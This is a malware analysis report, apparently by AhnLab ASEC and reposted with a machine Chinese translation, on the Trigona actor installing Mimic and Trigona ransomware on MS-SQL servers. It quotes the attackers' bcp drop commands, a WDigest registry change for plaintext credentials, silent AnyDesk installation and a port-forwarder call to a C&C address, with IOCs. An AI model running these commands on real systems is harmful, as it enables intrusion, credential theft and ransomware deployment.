Trigona Ransomware Threat Actor Uses Mimic Ransomware

AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for exploiting the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process.
AhnLab安全情报中心(ASEC)最近发现了安装Mimic勒索软件的Trigona勒索软件威胁行为者的新活动。与过去的案例一样,最近检测到的攻击目标是MS-SQL服务器,并在恶意软件安装过程中利用MS-SQL服务器中的大容量复制程序(BCP)实用程序。

  • Trigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.
    Trigona勒索软件:已知至少自2022年6月以来一直活跃[1];通常针对MS-SQL服务器进行攻击,并且仍然活跃。
  • Mimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].
    模仿勒索软件:首次发现于2022年6月[2]。2024年1月,一个讲土耳其语的威胁行为者攻击了管理不善的MS-SQL服务器并安装了Mimic [3]。

ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead of Mimic. The threat actor’s email address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023 [4].
ASEC在2024年1月初首次发现了使用BCP安装Mimic的攻击案例。2024年1月中旬,在安装Trigona而不是Mimic的地方发现了类似类型的攻击。Mimic的勒索信中使用的威胁行为者的电子邮件地址在其他攻击案例中没有发现,但后来发现的Trigona的勒索信中包含了Trigona威胁行为者自2023年初以来一直使用的电子邮件地址[4]。

Accordingly, the attack detected in mid-January 2024 is thought to be launched by the previous Trigona threat actor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early January 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used for malware installation, and the various strings and paths used in attacks were the same. In addition, the same malware was used in each attack case.
因此,2024年1月中旬检测到的攻击被认为是由之前的Trigona威胁行为者发起的,该行为者也被认为是2024年1月初发现的Mimic勒索软件攻击背后的同一攻击者。这是基于以下事实:这两种情况都针对管理不善的MS-SQL服务器,BCP用于恶意软件安装,并且攻击中使用的各种字符串和路径是相同的。此外,在每个攻击案例中使用了相同的恶意软件。

1. Trigona Ransomware

Trigona ransomware is developed in Delphi and uses RSA and AES encryption algorithms when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona attacking the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, in April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].
Trigona勒索软件是在德尔菲中开发的,在加密文件时使用RSA和AES加密算法。Arete在2023年2月的一份报告证实了Trigona攻击ManageEngine漏洞(CVE-2021-40539)的案例。此外,在2023年4月,AhnLab的ASEC博客报道了一个针对管理不善的MS-SQL服务器的案例[6]。

MS-SQL servers were targeted again in the recent attack case like cases of 2023, and with the threat actor’s email address saved in the ransom note, it can be confirmed that the recently detected Trigona ransomware’s threat actor is the same attacker responsible for previous cases.
MS-SQL服务器在最近的攻击案例(如2023案例)中再次成为目标,并且威胁行为者的电子邮件地址保存在赎金说明中,可以确认最近检测到的Trigona勒索软件的威胁行为者是负责以前案例的同一攻击者。

  • Email: farusbig@tutanota[.]com
    电子邮件:farusbig@tutanota[.]网
  • URL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 1. Encrypted files and ransom note
图1.加密文件和勒索信

2. Mimic Ransomware 2. Mimic勒索软件

Mimic ransomware is known for exploiting a file search program called Everything while looking for files to encrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the target system. The attacker also copied some features of Conti ransomware the source code of which was leaked during the development stage [7].
模仿勒索软件以利用名为Everything的文件搜索程序而闻名,同时寻找要加密的文件。据信,威胁行为者正在使用Everything工具来加速目标系统中文件的加密。攻击者还复制了Conti勒索软件的一些功能,其源代码在开发阶段泄露[7]。

The Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report released in January 2024 almost had the same external structure as the one used in this attack. The malware was made into a 7z SFX executable and contains a compressed file named “Everything64.dll” which is a password-protected collection of the actual malware files and the Everything tool. When the malware is executed, the 7z and “Everything64.dll” compressed files are decompressed using the appropriate passwords as shown below.
2023年1月发布的趋势科技报告和2024年1月发布的Securonix报告中的Mimic勒索软件样本与此次攻击中使用的外部结构几乎相同。该恶意软件被制作成7z SFX可执行文件,并包含一个名为“Everything64.dll”的压缩文件,该文件是实际恶意软件文件和Everything工具的密码保护集合。当恶意软件执行时,7z和“Everything64.dll”压缩文件将使用如下所示的适当密码进行解压缩。

> 7za.exe x -y -p58042791667523172 Everything64.dll
> 7za.exe x -y -p624417568130113444 Everything64.dll
Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 2. Files included in 7z SFX and the compressed file
图2. 7z SFX中包含的文件和压缩文件

The folder that is ultimately installed not only contains Mimic ransomware and the Everything tool, but also the Defender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) of Sysinternals.
最终安装的文件夹不仅包含Mimic勒索软件和Everything工具,还包含用于停用Windows Defender的Defender Control工具(DC.exe)和Sysinternals的SDelete工具(xdel.exe)。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 3. Installed files
图3.已安装文件

The threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples in the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack cases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in their attacks based on multiple circumstances that will be discussed later in this post.
勒索信中威胁行为者的电子邮件地址与2023年1月趋势科技报告和2024年1月Securonix报告中的Mimic勒索软件样本中使用的电子邮件地址不同,在其他攻击案例中也没有发现。另一方面,据推测,Trigona勒索软件威胁行为者也在基于多种情况的攻击中使用Mimic,这些情况将在本文稍后讨论。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 4. Encrypted files and ransom note
图4.加密文件和勒索信

3. Malware Installed Using BCP
3.使用BCP安装的恶意软件

Attack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account credentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the fact that the Trigona ransomware threat actor has been targeting these systems in attacks from the past, but also from infection logs of malware including LoveMiner and Remcos RAT from before and after the respective attack processes.
攻击目标被认为是管理不善和外部暴露的MS-SQL服务器,这些服务器具有简单的帐户凭据,使它们容易受到暴力攻击或字典攻击。这不仅可以从Trigona勒索软件威胁行为者过去一直针对这些系统进行攻击的事实中推断出来,还可以从包括LoveMiner和Remcos RAT在内的恶意软件在各自攻击过程前后的感染日志中推断出来。


3.1. Files Created Using BCP
3.1.使用BCP创建的文件

The BCP utility bcp.exe is a command line tool used to import or export high volumes of external data in MS-SQL servers. It is generally used to save large amounts of data saved in the tables of the SQL servers as a local file or to export data files saved in the local system to the SQL server tables.
BCP实用程序bcp.exe是一个命令行工具,用于导入或导出MS-SQL服务器中的大量外部数据。它通常用于保存保存在SQL服务器表中的大量数据作为本地文件,或将保存在本地系统中的数据文件导出到SQL服务器表中。

Threat actors that target MS-SQL servers typically use PowerShell commands to download malware. Recently, some have been exploiting SQLPS, a PowerShell tool included in SQL servers [8]. However, in the case of this attack case, the threat actor most likely employed the method of saving their malware in a database and using BCP to create a local file from it.
针对MS-SQL服务器的威胁行为者通常使用PowerShell命令下载恶意软件。最近,有些人已经利用SQLPS,SQL服务器中包含的PowerShell工具[8]。然而,在这种攻击案例中,威胁行为者很可能采用了将恶意软件保存在数据库中并使用BCP从中创建本地文件的方法。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 5. Malware created using BCP
图5.使用BCP创建的恶意软件

The threat actor used the following command in “uGnzBdZbsi”, the table containing the Trigona ransomware binary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain format information.
威胁行为者在“uGnzBdZbsi”(包含Trigona勒索软件二进制文件的表)中使用以下命令将Trigona导出到本地路径。请注意,“FODsOZKgAU.txt”是一个格式文件,被认为包含格式信息。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 6. BCP command used in the attacks
图6.攻击中使用的BCP命令

The following are BCP commands used to export various malware and tools used in the attacks.
以下是用于导出攻击中使用的各种恶意软件和工具的BCP命令。

  • Anydesk
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\AD.exe”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Port forwarder malware 端口转发恶意软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\4.exe”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Launcher malware Launcher恶意软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\pp2.exe”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\pp2.exe”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Mimic ransomware 模拟勒索软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\K2K.txt”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\K3K.txt”-T -f“C:\users\%ASD%\FODsOZKgAU.txt”
  • Trigona ransomware Trigona勒索软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\build.txt”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Others 别人
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\kkk.bat”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\ProgramData\kur.bat”-T -f“C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp“select binaryTable from uGnzBdZbsi”queryout“C:\users\%ASD%\music\kkk.bat”-T -f“C:\users\%ASD%\music\FODsOZKgAU.txt”


3.2. Looking Up Information
3.2.查找信息

The commands that the threat actor first executes before creating the malware with BCP (meaning that the attack was successful) are those that look up the infected system’s information as shown below. The threat actor would install malware suitable for the environment based on the information gained through these commands.
在创建带有BCP的恶意软件(意味着攻击成功)之前,威胁行为者首先执行的命令是查找受感染系统信息的命令,如下所示。威胁行为者将根据通过这些命令获得的信息安装适合环境的恶意软件。

> hostname >主机名
> whoami
> wmic computersystem get domain
> wmic computersystem get totalphysicalmemory
> wmic计算机系统获取总物理内存


3.3. Stealing Account Credentials
3.3.窃取帐户凭据

The Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. While no logs of Mimikatz were found in the attack process, the attacker sometimes executed a command to configure the UseLogonCredential registry key to obtain the plain text password using the WDigest security package.
已知Trigona威胁行为者使用Mimikatz窃取帐户凭据[9][10]。虽然在攻击过程中没有发现Mimikatz的日志,但攻击者有时会执行一个命令来配置WDigest LogonCredential注册表项,以使用WDigest安全包获取纯文本密码。

> REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001
> REG ADD“HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest”/v登录凭据/t REG_DWORD /d 0x 0000001


3.4. AnyDesk 3.4. AnyDesk。

In addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows a user to remotely access an environment installed with RDP or AnyDesk and control it in the GUI environment.
此外,威胁行为者还安装了AnyDesk来控制受感染的系统。AnyDesk是一个远程管理工具,提供各种功能,如远程桌面和文件传输。远程桌面是一项功能,允许用户远程访问安装了RDP或AnyDesk的环境,并在GUI环境中对其进行控制。

AnyDesk is a major remote administration tool exploited not only by the aforementioned Trigona ransomware attacker, but also by most threat groups. There are many cases where remote administration tools are used for legitimate purposes such as working from home or remote control and management. Accordingly, anti-malware products cannot simply detect and block these tools, unlike typical malware. Threat actors take advantage of this fact to install remote administration tools instead of RAT-type malware during the initial access or lateral movement phases to control the target system.
AnyDesk是一种主要的远程管理工具,不仅被上述Trigona勒索软件攻击者利用,而且被大多数威胁组织利用。在许多情况下,远程管理工具用于合法目的,例如在家工作或远程控制和管理。因此,反恶意软件产品不能简单地检测和阻止这些工具,不像典型的恶意软件。威胁行为者利用这一事实,在初始访问或横向移动阶段安装远程管理工具,而不是RAT类型的恶意软件,以控制目标系统。

> %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent
> %SystemDrive%\users\%ASD%\music\AD.exe -install C:\“Program Files(x86)”\ -silent

> %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id”
> %SystemDrive%\“Program Files(x86)”\AnyDesk-ad_1514b2f9.exe -get-id”


4. Analysis of Malware Used in the Attack
4.攻击中使用的恶意软件分析

Besides using BCP, another notable fact for the recent attack cases confirmed is that there is evidence of safe mode being utilized. Two additional malware deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.
除了使用BCP之外,最近确认的攻击案例的另一个值得注意的事实是,有证据表明使用了安全模式。在Mimic和Trigona勒索软件攻击中还发现了另外两个被认为是由威胁行为者创建的恶意软件。

One is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.
一个是启动器,它将自己注册为即使在安全模式下也可以运行的服务。当它作为服务运行时,它执行作为参数给出的程序。另一种是端口转发器恶意软件,它像启动器一样,将自己注册为可以在安全模式下运行的服务。然后它激活RDP并支持RDP端口转发到作为参数给出的地址。

According to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.
根据PDB信息,威胁行为者将启动器恶意软件命名为“app 2”,将端口转发器命名为“client”。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 7. Malware created by the threat actor with similar PDB information
图7.由具有类似PDB信息的威胁参与者创建的恶意软件

Although no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command were identified as shown below. As the launcher deactivated the safe mode boot option after executing the malware given as an argument, it is likely that the threat actor installed the malware and then rebooted the system in safe mode to run the ransomware.
虽然没有发现将系统靴子选项设置为安全模式的恶意软件或命令日志,但已确定MS-SQL Server进程执行系统重新启动命令的日志,如下所示。由于启动器在执行作为参数给出的恶意软件后停用了安全模式靴子选项,因此威胁行为者很可能安装了恶意软件,然后在安全模式下重新启动系统以运行勒索软件。

> shutdown -r -f -t 5

4.1. Launcher Malware 4.1.启动器恶意软件

The threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher copies itself into the “C:\windows\temp\LeVfeNXHoa” path. It then carries out the next task according to the given argument. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.
威胁执行者使用下面显示的参数执行启动器恶意软件。执行时,启动器将自身复制到“C:\windows\temp\LeVfeNXHoa”路径中。然后根据给定参数执行下一个任务。第一个参数给出服务名称,第二个参数给出要复制的文件的路径。第二个参数指定的路径中的文件将移动到第三个参数指定的路径。通过第二个参数给出的文件是Mimic勒索软件。

> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”
> %ALLUSERSPROFILE%\pp2.exe 111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”

The launcher registers itself as a service under the name “1111111” which was given as the first argument and runs additional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to be booted up normally again.
启动器将自己注册为名称为“111111”的服务,该名称作为第一个参数给出,并运行额外的任务以允许自己在安全模式下运行。之后,它在作为服务运行时在第三个参数给出的路径中执行勒索软件。当该过程完成时,它会停用安全模式选项,允许系统再次正常启动。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 8. Routine of setting the safe mode option for the registered service and deactivating this option after executing the ransomware
图8.为注册服务设置安全模式选项,并在执行勒索软件后停用此选项的例程

4.2. Port Forwarder 4.2.港口货运代理

The threat actor gave the following argument to execute the port forwarder malware. Port forwarding is a feature where data transmitted from a certain port is forwarded to another port. This malware supports port forwarding to the RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the threat actor cannot directly access the NAT environment from outside.
威胁行为者给出了以下参数来执行端口转发器恶意软件。端口转发是将从某个端口传输的数据转发到另一个端口的功能。此恶意软件支持端口转发到RDP服务或端口3389。通常,与RDP相关的端口转发工具用于克服威胁行为者无法从外部直接访问NAT环境的事实。

The port forwarder first connects to the threat actor’s address using the reverse connection method and then connects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able to establish an RDP connection even if the target system is running in a NAT environment, allowing them to control the infected system remotely. Because RDP is utilized in this manner, malware may execute the following commands to additionally enable the RDP service.
端口转发器首先使用反向连接方法连接到威胁参与者的地址,然后连接到受感染系统的RDP端口,中继这两个连接。因此,即使目标系统在NAT环境中运行,威胁行为者也能够建立RDP连接,从而允许他们远程控制受感染的系统。由于RDP是以这种方式使用的,因此恶意软件可以执行以下命令以额外启用RDP服务。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 9. RDP service activation routine
图9. RDP服务激活例程

When the port forwarder is executed in installation mode, it copies itself into the “C:\windows\temp\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware above.
在安装模式下执行端口转发程序时,它会将自身复制到“C:\windows\temp\WindowsHostServicess.exe”路径中,并将自身注册为名称为“WindowsHostServicess”的服务。该服务被配置为可以像上面的启动器恶意软件一样在安全模式下运行。

> %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install
> %SystemDrive%\users\%ASD%\music\4.exe -ip“2.57.149[.] 233”-端口“3366”-安装

The port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C&C server given as an argument to support port forwarding.
端口转发器有五个参数。其中三种模式支持安装、卸载和执行功能。在执行模式下,它不经过上面提到的服务安装过程,而是连接到作为参数提供的C&C服务器以支持端口转发。

Argument 论点 Description 描述
–install – 安装 Installation mode 安装模式
–uninstall – 卸载 Uninstallation mode 卸载模式
–run – 快跑 Execution mode 执行模式
–ip -ip C&C server’s IP address C&C服务器的IP地址
–port – 端口 C&C server’s port number C&C服务器的端口号
Table 1. Port forwarder arguments
表1.端口转发器参数

Before connecting to the C&C server, it saves basic system information such as the OS info and user and computer names in the “C:\windows\temp\elZDk6geQ8” path, transmitting the information upon the initial connection.
在连接到C&C服务器之前,它将基本系统信息(如操作系统信息和用户名和计算机名)保存在“C:\windows\temp\elZDk6geQ8”路径中,并在初始连接时传输信息。

Trigona Ransomware Threat Actor Uses Mimic Ransomware
Figure 10. System information forwarded to the C&C server
图10.转发到C&C服务器的系统信息

Then, it can perform port forwarding or auto-deletion commands based on the commands it receives from the C&C server.
然后,它可以根据从C&C服务器接收的命令执行端口转发或自动删除命令。

Command 命令 Feature 特征
0x8CC03FAF Start port forwarding between the C&C server and the RDP service
启动C&C服务器和RDP服务之间的端口转发
0x0002C684 Auto-delete 自动删除
Table 2. Port forwarder arguments
表2.端口转发器参数

5. Conclusion 5.结论

Recently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely.
最近,Trigona勒索软件威胁攻击者一直在管理不善的MS-SQL服务器上安装Mimic和Trigona勒索软件。已经发现,攻击者还试图使用恶意软件进行端口转发,以建立与受感染系统的RDP连接并对其进行远程控制。

Ransomware threat actors encrypt infected systems and extort sensitive information to threaten the victims to raise profits. Because they employ various techniques for account credential theft and lateral movement, single systems as well as the entire internal company network may be at risk of being compromised, resulting in having sensitive data stolen and systems in the network encrypted.
勒索软件威胁行为者加密受感染的系统并勒索敏感信息,以威胁受害者提高利润。由于他们采用各种技术进行帐户凭据盗窃和横向移动,因此单个系统以及整个公司内部网络都可能面临被泄露的风险,导致敏感数据被盗,网络中的系统被加密。

Typical attacks that target MS-SQL servers include brute force attacks and dictionary attacks to systems where account credentials are poorly being managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks.
针对MS-SQL服务器的典型攻击包括对帐户凭据管理不善的系统的暴力攻击和字典攻击。管理员必须使用不易被猜出的密码,并定期更改密码,以保护数据库服务器免受暴力破解和字典攻击。

V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware can occur.
V3也必须更新到最新版本,以提前阻止恶意软件感染。管理员还应该使用安全程序,例如从外部访问数据库服务器的防火墙,以限制外部威胁参与者的访问。如果不提前采取上述措施,可能会发生威胁行为者和恶意软件的持续感染。

File Detection 文件检测
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– Trojan/Win.Generic.R531737(2022.10.27.00)

– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– HackTool/Win.DefenderControl.C5481630(2023.09.06.00)

– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Mimic.C5543473(2023.11.18.01)

– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
Ransomware/Win.Filecoder.C5561780(2023.12.12.01)(英文)

– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574264(2024.01.14.03)

– Trojan/Win.Agent.C5574265 (2024.01.14.03)
– Trojan/Win.Agent.C5574265(2024.01.14.03)

Behavior Detection 行为检测Behaviour Detection
– Malware/MDP.Minipulate.M71
– 恶意软件/MDP.Minipulate.M71

– Persistence/MDP.AutoRun.M203
– 持久性/MDP.AutoRun.M203

– DefenseEvasion/MDP.ModifyRegistry.M1234
– DefenseEvasion/MDP.ModifyRegistry.M1234

– Ransom/MDP.Decoy.M1171 – Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367
– CredentialAccess/MDP.Mimikatz.M4367

IOC
MD5

– a24bac9071fb6e07e13c52f65a093fce: Launcher (pp2.exe)
– a24 bac 9071 fb 6 e07 e13 c52 f65 a093 fce:启动器(pp2.exe)

– a6e2722cff3abb214dc1437647964c57: Launcher (pp2.exe)
– a6 e2722 cff 3abb 214 dc 1437647964 c57:启动器(pp2.exe)

– 3e26e778a4d28003686596f988942646: Port Forwarder (4.exe)
-3e 26 e778 a4 d28003686596 f988942646:端口转发器(4.exe)

– d6b4b1b6b0ec1799f57142798c5daf5b: Mimic Ransomware Dropper (K2K.exe)
– d6b4b1b6b0ec1799f57142798c5daf5b:Mimic Ransomware Dropper(K2K.exe)

– 6d44f8f3c1608e5958b40f9c6d7b6718: Mimic Ransomware Dropper (K3K.exe)
– 6d44f8f3c1608e5958b40f9c6d7b6718:Mimic Ransomware Dropper(K3K.exe)

– b3c8d81d6f8d19e5c07e1ca7932ed5bf: Mimic Ransomware (K2K.exe)
– b3c8d81d6f8d19e5c07e1ca7932ed5bf:Mimic Ransomware(K2K.exe)

– a02157550bc9b491fd03cad394ccdfe7: Mimic Ransomware (3usdaa.exe)
– a02157550bc9b491fd03cad394ccdfe7:Mimic Ransomware(3usdaa.exe)

– c28b33f7365f9dc72cc291d13458f334: Trigona Ransomware (build.txt)
– c28b33f7365f9dc72cc291d13458f334:Trigona Ransomware(build.txt)

– ac34ba84a5054cd701efad5dd14645c9: Defender Control (DC.exe)
– ac34ba84a5054cd701efad5dd14645c9:Defender Control(DC.exe)

C&C
– 2.57.149[.]233:3366 – 2.57.149[.]二三三:三三六六

原文始发于ASEC:Trigona Ransomware Threat Actor Uses Mimic Ransomware

版权声明:admin 发表于 2024年2月6日 下午1:15。
转载请注明:Trigona Ransomware Threat Actor Uses Mimic Ransomware | CTF导航

相关文章